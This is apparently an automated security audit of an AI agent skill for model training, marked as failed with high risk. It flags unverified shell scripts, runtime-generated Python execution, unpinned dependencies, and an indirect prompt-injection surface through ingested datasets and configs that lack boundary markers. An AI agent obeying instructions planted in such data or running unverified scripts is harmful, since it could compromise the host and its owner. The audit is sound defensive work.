training-patterns
Fail
Audited by Gen Agent Trust Hub on Feb 16, 2026
Risk Level: HIGHCOMMAND_EXECUTIONEXTERNAL_DOWNLOADSREMOTE_CODE_EXECUTIONPROMPT_INJECTION
Full Analysis
- COMMAND_EXECUTION (HIGH): The skill README instructs the execution of shell scripts (e.g.,
./scripts/setup-peft.sh) that are described as functional but are missing from the skill package. Running unverified shell scripts is a high-risk operation that could compromise the host system. - REMOTE_CODE_EXECUTION (HIGH): The skill's primary functionality involves dynamically generating and then executing Python scripts (
train.py,predict.py). This pattern is a significant security risk as it can be used to obfuscate malicious behavior or bypass static analysis by materializing executable logic at runtime. - EXTERNAL_DOWNLOADS (MEDIUM): The example workflows require installing dependencies via
pip install -r requirements.txt. Without a provided requirements file or pinned versions for packages liketransformersandpeft, this introduces a risk of supply chain attacks through malicious third-party dependencies. - PROMPT_INJECTION (MEDIUM): Per Category 8, the skill exhibits a clear indirect prompt injection surface by ingesting external datasets and user-defined parameters. Ingestion points:
classification-config.yaml,generation-config.yaml(CSV/JSON datasets). Boundary markers: Absent. Capabilities: Command execution and file system modification. Sanitization: None detected. If user-controlled data or configuration strings are interpolated into the generated scripts or shell commands without strict sanitization, it leads to arbitrary command injection.
Recommendations
- AI detected serious security threats
Audit Metadata